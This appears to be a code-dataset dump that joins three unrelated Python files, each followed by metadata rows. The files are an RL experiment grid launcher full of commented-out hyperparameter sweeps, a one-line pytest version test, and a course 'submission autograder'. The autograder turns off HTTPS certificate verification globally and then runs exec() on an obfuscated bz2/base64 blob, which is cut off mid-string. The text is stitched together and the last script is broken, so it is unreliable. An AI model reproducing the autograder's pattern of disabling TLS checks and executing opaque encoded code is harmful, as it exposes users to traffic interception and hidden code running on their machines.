# "n_updates_per_step": [2],
# "update_target_every": [2],
# },
# ]
# basename = "walker_walk_v1_seeds"
# grid = [
# {
# # define the task
# "_main": ["main.py"],
# "eval_every": [1],
# "env": ["walker"],
# "task": ["walk"],
# "seed": list(range(4)),
# "no_exploration": [True, False],
# # density settings
# "density": ["keops_kernel_count"],
# "density_state_scale": [5e-1],
# "density_action_scale": [1],
# "density_max_obs": [2**15],
# "density_tolerance": [0.5],
# "density_conserve_weight": [True],
# # task policy settings
# "policy": ["sac"],
# "policy_updates_per_step": [1],
# # novelty Q settings
# "uniform_update_candidates": [True],
# "n_updates_per_step": [2],
# "update_target_every": [2],
# },
# ]
# basename = "finger_all_v6_scale_low"
# grid = [
# {
# # define the task
# "_main": ["main.py"],
# "eval_every": [1],
# "env": ["finger_explore"],
# "task": ["turn_hard_narrow"],
# "seed": list(range(8)),
# "no_exploration": [True, False],
# # density settings
# "density": ["keops_kernel_count"],
# "density_state_scale": [0.1],
# "density_action_scale": [1],
# "density_max_obs": [2**15],
# "density_tolerance": [0.5],
# "density_conserve_weight": [True],
# # task policy settings
# "policy": ["sac"],
# "policy_updates_per_step": [1],
# # novelty Q settings
# "uniform_update_candidates": [True],
# "n_updates_per_step": [2],
# "update_target_every": [2],
# },
# {
# # define the task
# "_main": ["main.py"],
# "eval_every": [1],
# "env": ["finger"],
# "task": ["turn_hard"],
# "seed": list(range(8)),
# "no_exploration": [True, False],
# # density settings
# "density": ["keops_kernel_count"],
# "density_state_scale": [0.1],
# "density_action_scale": [1],
# "density_max_obs": [2**15],
# "density_tolerance": [0.5],
# "density_conserve_weight": [True],
# # task policy settings
# "policy": ["sac"],
# "policy_updates_per_step": [1],
# # novelty Q settings
# "uniform_update_candidates": [True],
# "n_updates_per_step": [2],
# "update_target_every": [2],
# },
# ]
# finger_all_v1arrow_seed0_no_explorationTrue--rrow_seed0_no_explorationFalse.slurm
# basename = "finger_all_v2_rerun"
# grid = [
# {
# # define the task
# "_main": ["main.py"],
# "eval_every": [5],
# "env": ["finger_explore"],
# "task": ["turn_hard_narrow"],
# "seed": [0],
# "no_exploration": [True, False],
# # density settings
# "density": ["keops_kernel_count"],
# "density_state_scale": [0.34],
# "density_action_scale": [1],
# "density_max_obs": [2**15],
# "density_tolerance": [0.9],
# "density_conserve_weight": [True],
# # task policy settings
# "policy": ["sac"],
# "policy_updates_per_step": [1],
# # novelty Q settings
# "uniform_update_candidates": [True],
# "n_updates_per_step": [2],
# "update_target_every": [2],
# },
# ]
# basename = "fex_hard_v3_seeds"
# grid = [
# {
# # define the task
# "_main": ["main.py"],
# "eval_every": [5],
# "env": ["finger_explore"],
# "task": ["turn_hard_narrow"],
# "seed": list(range(4)),
# "no_exploration": [True, False],
# # density settings
# "density": ["keops_kernel_count"],
# "density_state_scale": [1e-1],
# "density_action_scale": [1],
# "density_max_obs": [2**15],
# "density_tolerance": [0.5],
# "density_conserve_weight": [True],
# # task policy settings
# "policy": ["sac"],
# "policy_updates_per_step": [1],
# # novelty Q settings
# "uniform_update_candidates": [True],
# "n_updates_per_step": [2],
# "update_target_every": [2],
# },
# ]
# basename = "finger_v2"
# grid = [
# {
# # define the task
# "_main": ["main.py"],
# "eval_every": [5],
# "env": ["finger"],
# "task": ["turn_hard"],
# "seed": list(range(4)),
# "no_exploration": [True, False],
# # density settings
# "density": ["keops_kernel_count"],
# "density_state_scale": [1e-1],
# "density_action_scale": [1],
# "density_max_obs": [2**15],
# "density_tolerance": [0.5],
# "density_conserve_weight": [True],
# # task policy settings
# "policy": ["sac"],
# "policy_updates_per_step": [1],
# # novelty Q settings
# "uniform_update_candidates": [True],
# "n_updates_per_step": [2],
# "update_target_every": [2],
# },
# ]
# basename = "bice_v6_seeds"
# grid = [
# {
# # define the task
# "_main": ["main.py"],
# "eval_every": [1],
# "env": ["ball_in_cup", "ball_in_cup_explore"],
# "task": ["catch"],
# "no_exploration": [True, False],
# "seed": list(range(4)),
# # density settings
# "density": ["keops_kernel_count"],
# "density_state_scale": [0.24],
# "density_action_scale": [1],
# "density_max_obs": [2**15],
# "density_tolerance": [0.9],
# "density_conserve_weight": [True],
# # task policy settings
# "policy": ["sac"],
# # novelty Q settings
# "uniform_update_candidates": [True],
# "n_updates_per_step": [2],
# "update_target_every": [2],
# },
# ]
# basename = "reacher_v10_correct"
# grid = [
# {
# # define the task
# "_main": ["main.py"],
# "eval_every": [1],
# "env": ["reacher_explore"],
# "task": ["hard_narrow_init"],
# "max_episodes": [500],
# "no_exploration": [True, False],
# "seed": list(range(8)),
# # density settings
# "density": ["keops_kernel_count"],
# "density_state_scale": [0.06],
# "density_action_scale": [1],
# "density_max_obs": [2**15],
# "density_tolerance": [0.9],
# "density_conserve_weight": [True],
# # task policy settings
# "policy": ["sac"],
# # novelty Q settings
# "uniform_update_candidates": [True],
# "n_updates_per_step": [2],
# "update_target_every": [2],
# },
# {
# # define the task
# "_main": ["main.py"],
# "eval_every": [1],
# "env": ["reacher"],
# "task": ["hard"],
# "max_episodes": [500],
# "no_exploration": [True, False],
# "seed": list(range(8)),
# # density settings
# "density": ["keops_kernel_count"],
# "density_state_scale": [0.06],
# "density_action_scale": [1],
# "density_max_obs": [2**15],
# "density_tolerance": [0.9],
# "density_conserve_weight": [True],
# # task policy settings
# "policy": ["sac"],
# # novelty Q settings
# "uniform_update_candidates": [True],
# "n_updates_per_step": [2],
# "update_target_every": [2],
# },
# ]
# reacher_explore_v8_seedshard_no_explorationFalse_seed4--hard_no_explorationFalse_seed5
# basename = "reacher_explore_v9_rerun"
# grid = [
# {
# # define the task
# "_main": ["main.py"],
# "eval_every": [1],
# "env": ["reacher_explore"],
# "task": ["hard"],
# "max_episodes": [500],
# "no_exploration": [False],
# "seed": [4, 5],
# # density settings
# "density": ["keops_kernel_count"],
# "density_state_scale": [0.18],
# "density_action_scale": [1],
# "density_max_obs": [2**15],
# "density_tolerance": [0.9],
# "density_conserve_weight": [True],
# # task policy settings
# "policy": ["sac"],
# # novelty Q settings
# "uniform_update_candidates": [True],
# "n_updates_per_step": [2],
# "update_target_every": [2],
# },
# ]
# basename = "hallway_all_v4"
# grid = [
# {
# # define the task
# "_main": ["main.py"],
# "eval_every": [1],
# "env": ["hallway"],
# "task": ["velocity_1", "velocity_4_inverse_distractor"],
# "max_episodes": [100],
# "no_exploration": [True, False],
# "seed": list(range(4)),
# # density settings
# "density": ["keops_kernel_count"],
# "density_state_scale": [0.068],
# "density_action_scale": [1],
# "density_max_obs": [2**15],
# "density_tolerance": [0.9],
# "density_conserve_weight": [True],
# # task policy settings
# "policy": ["sac"],
# # novelty Q settings
# "uniform_update_candidates": [True],
# "n_updates_per_step": [2],
# "update_target_every": [2],
# },
# {
# # define the task
# "_main": ["main.py"],
# "eval_every": [1],
# "env": ["hallway"],
# "task": ["velocity_4", "velocity_4_distractor"],
# "max_episodes": [300],
# "no_exploration": [True, False],
# "seed": list(range(4)),
# # density settings
# "density": ["keops_kernel_count"],
# "density_state_scale": [0.068],
# "density_action_scale": [1],
# "density_max_obs": [2**15],
# "density_tolerance": [0.9],
# "density_conserve_weight": [True],
# # task policy settings
# "policy": ["sac"],
# # novelty Q settings
# "uniform_update_candidates": [True],
# "n_updates_per_step": [2],
# "update_target_every": [2],
# },
# ]
# basename = "hallway_vis_v2"
# grid = [
# {
# # define the task
# "_main": ["main.py"],
# "eval_every": [1],
# "env": ["hallway"],
# "task": ["velocity_4"],
# "video_every": [1],
# "no_exploration": [False, True],
# # "seed": [0, 1],
# # density settings
# "density": ["keops_kernel_count"],
# "density_state_scale": [0.01],
# "density_action_scale": [1],
# "density_max_obs": [2**15],
# "density_tolerance": [0.5],
# # task policy settings
# "policy": ["sac"],
# "policy_updates_per_step": [4],
# # novelty Q settings
# "uniform_update_candidates": [True],
# "n_updates_per_step": [2],
# "update_target_every": [2],
# },
# ]
# basename = "pv100_v10_greene"
# grid = [
# {
# # define the task
# "_main": ["main.py"],
# "eval_every": [1],
# "env": ["point"],
# "task": ["velocity"],
# "seed": list(range(2)),
# "no_exploration": [True, False],
# # density settings
# "density": ["keops_kernel_count"],
# "density_state_scale": [6e-2],
# "density_action_scale": [1],
# "density_max_obs": [2**15],
# "density_tolerance": [0.95],
# "density_conserve_weight": [True],
# # task policy settings
# "policy": ["sac"],
# "policy_updates_per_step": [4],
# # novelty Q settings
# "uniform_update_candidates": [True],
# "n_updates_per_step": [2],
# "update_target_every": [2],
# },
# ]
basename = "bbe_all_v3_moreseeds"
grid = [
# reacher
{
# define the task
"_main": ["main_bbe.py"],
"eval_every": [1],
"env": ["reacher_explore"],
"task": ["hard_narrow_init"],
"max_episodes": [500],
"seed": list(range(4, 8)),
# density settings
"density": ["keops_kernel_count"],
"density_state_scale": [0.06],
"density_action_scale": [1],
"density_max_obs": [2**15],
"density_tolerance": [0.9],
"density_conserve_weight": [True],
# task policy settings
"policy": ["sac"],
},
{
# define the task
"_main": ["main_bbe.py"],
"eval_every": [1],
"env": ["reacher"],
"task": ["hard"],
"max_episodes": [500],
"seed": list(range(4, 8)),
# density settings
"density": ["keops_kernel_count"],
"density_state_scale": [0.06],
"density_action_scale": [1],
"density_max_obs": [2**15],
"density_tolerance": [0.9],
"density_conserve_weight": [True],
# task policy settings
"policy": ["sac"],
},
# ball-in-cup
{
# define the task
"_main": ["main_bbe.py"],
"eval_every": [1],
"env": ["ball_in_cup", "ball_in_cup_explore"],
"task": ["catch"],
"seed": list(range(4, 8)),
# density settings
"density": ["keops_kernel_count"],
"density_state_scale": [0.078],
"density_action_scale": [1],
"density_max_obs": [2**15],
"density_tolerance": [0.9],
"density_conserve_weight": [True],
# task policy settings
"policy": ["sac"],
},
# finger
{
# define the task
"_main": ["main_bbe.py"],
"eval_every": [1],
"env": ["finger_explore"],
"task": ["turn_hard_narrow"],
"seed": list(range(4, 8)),
# density settings
"density": ["keops_kernel_count"],
"density_state_scale": [0.11],
"density_action_scale": [1],
"density_max_obs": [2**15],
"density_tolerance": [0.5],
"density_conserve_weight": [True],
# task policy settings
"policy": ["sac"],
"policy_updates_per_step": [1],
},
{
# define the task
"_main": ["main_bbe.py"],
"eval_every": [1],
"env": ["finger"],
"task": ["turn_hard"],
"seed": list(range(4, 8)),
# density settings
"density": ["keops_kernel_count"],
"density_state_scale": [0.11],
"density_action_scale": [1],
"density_max_obs": [2**15],
"density_tolerance": [0.5],
"density_conserve_weight": [True],
# task policy settings
"policy": ["sac"],
"policy_updates_per_step": [1],
},
# walker
{
# define the task
"_main": ["main_bbe.py"],
"eval_every": [1],
"env": ["walker_explore"],
"task": ["walk_narrow_sparse"],
"seed": list(range(4, 8)),
# density settings
"density": ["keops_kernel_count"],
"density_state_scale": [0.16],
"density_action_scale": [1],
"density_max_obs": [2**15],
"density_tolerance": [0.5],
"density_conserve_weight": [True],
# task policy settings
"policy": ["sac"],
"policy_updates_per_step": [1],
},
{
# define the task
"_main": ["main_bbe.py"],
"eval_every": [1],
"env": ["walker"],
"task": ["walk"],
"seed": list(range(4, 8)),
# density settings
"density": ["keops_kernel_count"],
"density_state_scale": [0.16],
"density_action_scale": [1],
"density_max_obs": [2**15],
"density_tolerance": [0.5],
"density_conserve_weight": [True],
# task policy settings
"policy": ["sac"],
"policy_updates_per_step": [1],
},
]
# basename = "ufo_all_v3_moreseeds"
# grid = [
# # reacher
# {
# # define the task
# "_main": ["main.py"],
# "eval_every": [1],
# "env": ["reacher_explore"],
# "task": ["hard_narrow_init"],
# "max_episodes": [500],
# "seed": list(range(4, 8)),
# # density settings
# "density": ["keops_kernel_count"],
# "density_state_scale": [0.06],
# "density_action_scale": [1],
# "density_max_obs": [2**15],
# "density_tolerance": [0.9],
# "density_conserve_weight": [True],
# # task policy settings
# "policy": ["sac"],
# "policy_updates_per_step": [1],
# # novelty Q settings
# "uniform_update_candidates": [True],
# "n_updates_per_step": [2],
# "update_target_every": [2],
# },
# {
# # define the task
# "_main": ["main.py"],
# "eval_every": [1],
# "env": ["reacher"],
# "task": ["hard"],
# "max_episodes": [500],
# "seed": list(range(4, 8)),
# # density settings
# "density": ["keops_kernel_count"],
# "density_state_scale": [0.06],
# "density_action_scale": [1],
# "density_max_obs": [2**15],
# "density_tolerance": [0.9],
# "density_conserve_weight": [True],
# # task policy settings
# "policy": ["sac"],
# "policy_updates_per_step": [1],
# # novelty Q settings
# "uniform_update_candidates": [True],
# "n_updates_per_step": [2],
# "update_target_every": [2],
# },
# # ball-in-cup
# {
# # define the task
# "_main": ["main.py"],
# "eval_every": [1],
# "env": ["ball_in_cup", "ball_in_cup_explore"],
# "task": ["catch"],
# "seed": list(range(4, 8)),
# # density settings
# "density": ["keops_kernel_count"],
# "density_state_scale": [0.078],
# "density_action_scale": [1],
# "density_max_obs": [2**15],
# "density_tolerance": [0.9],
# "density_conserve_weight": [True],
# # task policy settings
# "policy": ["sac"],
# "policy_updates_per_step": [1],
# # novelty Q settings
# "uniform_update_candidates": [True],
# "n_updates_per_step": [2],
# "update_target_every": [2],
# },
# # finger
# {
# # define the task
# "_main": ["main.py"],
# "eval_every": [1],
# "env": ["finger_explore"],
# "task": ["turn_hard_narrow"],
# "seed": list(range(4, 8)),
# # density settings
# "density": ["keops_kernel_count"],
# "density_state_scale": [0.11],
# "density_action_scale": [1],
# "density_max_obs": [2**15],
# "density_tolerance": [0.5],
# "density_conserve_weight": [True],
# # task policy settings
# "policy": ["sac"],
# "policy_updates_per_step": [1],
# # novelty Q settings
# "uniform_update_candidates": [True],
# "n_updates_per_step": [2],
# "update_target_every": [2],
# },
# {
# # define the task
# "_main": ["main.py"],
# "eval_every": [1],
# "env": ["finger"],
# "task": ["turn_hard"],
# "seed": list(range(4, 8)),
# # density settings
# "density": ["keops_kernel_count"],
# "density_state_scale": [0.11],
# "density_action_scale": [1],
# "density_max_obs": [2**15],
# "density_tolerance": [0.5],
# "density_conserve_weight": [True],
# # task policy settings
# "policy": ["sac"],
# "policy_updates_per_step": [1],
# # novelty Q settings
# "uniform_update_candidates": [True],
# "n_updates_per_step": [2],
# "update_target_every": [2],
# },
# # walker
# {
# # define the task
# "_main": ["main.py"],
# "eval_every": [1],
# "env": ["walker_explore"],
# "task": ["walk_narrow_sparse"],
# "seed": list(range(4, 8)),
# # density settings
# "density": ["keops_kernel_count"],
# "density_state_scale": [0.16],
# "density_action_scale": [1],
# "density_max_obs": [2**15],
# "density_tolerance": [0.5],
# "density_conserve_weight": [True],
# # task policy settings
# "policy": ["sac"],
# "policy_updates_per_step": [1],
# # novelty Q settings
# "uniform_update_candidates": [True],
# "n_updates_per_step": [2],
# "update_target_every": [2],
# },
# {
# # define the task
# "_main": ["main.py"],
# "eval_every": [1],
# "env": ["walker"],
# "task": ["walk"],
# "seed": list(range(4, 8)),
# # density settings
# "density": ["keops_kernel_count"],
# "density_state_scale": [0.16],
# "density_action_scale": [1],
# "density_max_obs": [2**15],
# "density_tolerance": [0.5],
# "density_conserve_weight": [True],
# # task policy settings
# "policy": ["sac"],
# "policy_updates_per_step": [1],
# # novelty Q settings
# "uniform_update_candidates": [True],
# "n_updates_per_step": [2],
# "update_target_every": [2],
# },
# ]
# basename = "sacqex_all_v2"
# grid = [
# # reacher
# {
# # define the task
# "_main": ["main_sac_qex.py"],
# "eval_every": [1],
# "env": ["reacher_explore"],
# "task": ["hard_narrow_init"],
# "max_episodes": [500],
# "seed": list(range(4)),
# # density settings
# "density": ["keops_kernel_count"],
# "density_state_scale": [0.06],
# "density_action_scale": [1],
# "density_max_obs": [2**15],
# "density_tolerance": [0.9],
# "density_conserve_weight": [True],
# # task policy settings
# "policy": ["sac_qex"],
# },
# {
# # define the task
# "_main": ["main_sac_qex.py"],
# "eval_every": [1],
# "env": ["reacher"],
# "task": ["hard"],
# "max_episodes": [500],
# "seed": list(range(4)),
# # density settings
# "density": ["keops_kernel_count"],
# "density_state_scale": [0.06],
# "density_action_scale": [1],
# "density_max_obs": [2**15],
# "density_tolerance": [0.9],
# "density_conserve_weight": [True],
# # task policy settings
# "policy": ["sac_qex"],
# },
# # ball-in-cup
# {
# # define the task
# "_main": ["main_sac_qex.py"],
# "eval_every": [1],
# "env": ["ball_in_cup", "ball_in_cup_explore"],
# "task": ["catch"],
# "seed": list(range(4)),
# # density settings
# "density": ["keops_kernel_count"],
# "density_state_scale": [0.078],
# "density_action_scale": [1],
# "density_max_obs": [2**15],
# "density_tolerance": [0.9],
# "density_conserve_weight": [True],
# # task policy settings
# "policy": ["sac_qex"],
# },
# # finger
# {
# # define the task
# "_main": ["main_sac_qex.py"],
# "eval_every": [1],
# "env": ["finger_explore"],
# "task": ["turn_hard_narrow"],
# "seed": list(range(4)),
# # density settings
# "density": ["keops_kernel_count"],
# "density_state_scale": [0.11],
# "density_action_scale": [1],
# "density_max_obs": [2**15],
# "density_tolerance": [0.5],
# "density_conserve_weight": [True],
# # task policy settings
# "policy": ["sac_qex"],
# "policy_updates_per_step": [1],
# },
# {
# # define the task
# "_main": ["main_sac_qex.py"],
# "eval_every": [1],
# "env": ["finger"],
# "task": ["turn_hard"],
# "seed": list(range(4)),
# # density settings
# "density": ["keops_kernel_count"],
# "density_state_scale": [0.11],
# "density_action_scale": [1],
# "density_max_obs": [2**15],
# "density_tolerance": [0.5],
# "density_conserve_weight": [True],
# # task policy settings
# "policy": ["sac_qex"],
# "policy_updates_per_step": [1],
# },
# # walker
# {
# # define the task
# "_main": ["main_sac_qex.py"],
# "eval_every": [1],
# "env": ["walker_explore"],
# "task": ["walk_narrow_sparse"],
# "seed": list(range(4)),
# # density settings
# "density": ["keops_kernel_count"],
# "density_state_scale": [0.16],
# "density_action_scale": [1],
# "density_max_obs": [2**15],
# "density_tolerance": [0.5],
# "density_conserve_weight": [True],
# # task policy settings
# "policy": ["sac_qex"],
# "policy_updates_per_step": [1],
# },
# {
# # define the task
# "_main": ["main_sac_qex.py"],
# "eval_every": [1],
# "env": ["walker"],
# "task": ["walk"],
# "seed": list(range(4)),
# # density settings
# "density": ["keops_kernel_count"],
# "density_state_scale": [0.16],
# "density_action_scale": [1],
# "density_max_obs": [2**15],
# "density_tolerance": [0.5],
# "density_conserve_weight": [True],
# # task policy settings
# "policy": ["sac_qex"],
# "policy_updates_per_step": [1],
# },
# ]
# basename = "hallway_midstart_all_v1"
# grid = [
# {
# # define the task
# "_main": ["main.py"],
# "eval_every": [1],
# "env": ["hallway_midstart"],
# "task": ["velocity_4_offset_p5", "velocity_4_offset_1",
# "velocity_4_offset_1p5", "velocity_4_offset_2",],
# "max_episodes": [500],
# "seed": list(range(4)),
# "no_exploration": [True, False],
# # density settings
# "density": ["keops_kernel_count"],
# "density_state_scale": [0.02],
# "density_action_scale": [1],
# "density_max_obs": [2**15],
# "density_tolerance": [0.9],
# "density_conserve_weight": [True],
# # novelty Q settings
# "uniform_update_candidates": [True],
# "n_updates_per_step": [2],
# "update_target_every": [2],
# # task policy settings
# "policy": ["sac"],
# },
# {
# # define the task
# "_main": ["main_bbe.py"],
# "eval_every": [1],
# "env": ["hallway_midstart"],
# "task": ["velocity_4_offset_p5", "velocity_4_offset_1",
# "velocity_4_offset_1p5", "velocity_4_offset_2",],
# "max_episodes": [500],
# "seed": list(range(4)),
# # density settings
# "density": ["keops_kernel_count"],
# "density_state_scale": [0.02],
# "density_action_scale": [1],
# "density_max_obs": [2**15],
# "density_tolerance": [0.9],
# "density_conserve_weight": [True],
# # bbe settings
# "bonus_scale": [0.1, 1,],
# # task policy settings
# "policy": ["sac"],
# },
# ]
if __name__ == '__main__':
jobs = construct_jobs(grid, basename)
if local:
asyncio.run(main(jobs, MULTIPLEX=MULTIPLEX, GPUS=GPUS, dry_run=dry_run))
else:
slurm_main(jobs, MULTIPLEX=MULTIPLEX, greene=greene, dry_run=dry_run)
| 27.937273 | 88 | 0.495005 | 3,084 | 30,731 | 4.596304 | 0.050259 | 0.035979 | 0.05037 | 0.049171 | 0.930582 | 0.928677 | 0.926843 | 0.923739 | 0.921834 | 0.920988 | 0 | 0.031533 | 0.316846 | 30,731 | 1,099 | 89 | 27.962693 | 0.64366 | 0.803553 | 0 | 0.585938 | 0 | 0 | 0.292717 | 0.049803 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.078125 | 0 | 0.078125 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
8c3661f14ec5f2b38b81f6ede470c9d86f1dd6f8 | 98 | py | Python | tests/test_version.py | sondrelg/pytest-split | 9307bac36fd134c2244c80333e26c36b3e5316a1 | [
"MIT"
] | null | null | null | tests/test_version.py | sondrelg/pytest-split | 9307bac36fd134c2244c80333e26c36b3e5316a1 | [
"MIT"
] | null | null | null | tests/test_version.py | sondrelg/pytest-split | 9307bac36fd134c2244c80333e26c36b3e5316a1 | [
"MIT"
] | null | null | null | import pytest_split
def test_version() -> None:
assert pytest_split.__version__ is not None
| 16.333333 | 47 | 0.765306 | 14 | 98 | 4.857143 | 0.714286 | 0.323529 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.173469 | 98 | 5 | 48 | 19.6 | 0.839506 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.333333 | 1 | 0.333333 | true | 0 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
8c3ba0947f5bf1269feb25e6a36b50fbc83e7faa | 8,943 | py | Python | P4_BNs_and_HMMs_Ghostbusters/submission_autograder.py | zheedong/CS188_Project | f10676e0dd6c7f0c46419dced2700c083bd7da72 | [
"MIT"
] | 1 | 2021-12-10T13:55:03.000Z | 2021-12-10T13:55:03.000Z | tracking/submission_autograder.py | abrarrhine/Artificial-Intelligence | 20e6b183fc458977f0a9c157d5e40d8487408c86 | [
"MIT"
] | 13 | 2021-08-23T14:08:47.000Z | 2022-01-18T08:38:40.000Z | P4_BNs_and_HMMs_Ghostbusters/submission_autograder.py | zheedong/CS188_Project | f10676e0dd6c7f0c46419dced2700c083bd7da72 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import print_function
from codecs import open
import os, ssl
if (not os.environ.get('PYTHONHTTPSVERIFY', '') and getattr(ssl, '_create_unverified_context', None)):
ssl._create_default_https_context = ssl._create_unverified_context
"""
CS 188 Local Submission Autograder
Written by the CS 188 Staff
==============================================================================
_____ _ _
/ ____| | | |
| (___ | |_ ___ _ __ | |
\___ \| __/ _ \| '_ \| |
____) | || (_) | |_) |_|
|_____/ \__\___/| .__/(_)
| |
|_|
Modifying or tampering with this file is a violation of course policy.
If you're having trouble running the autograder, please contact the staff.
==============================================================================
"""
import bz2, base64
exec(bz2.decompress(base64.b64decode('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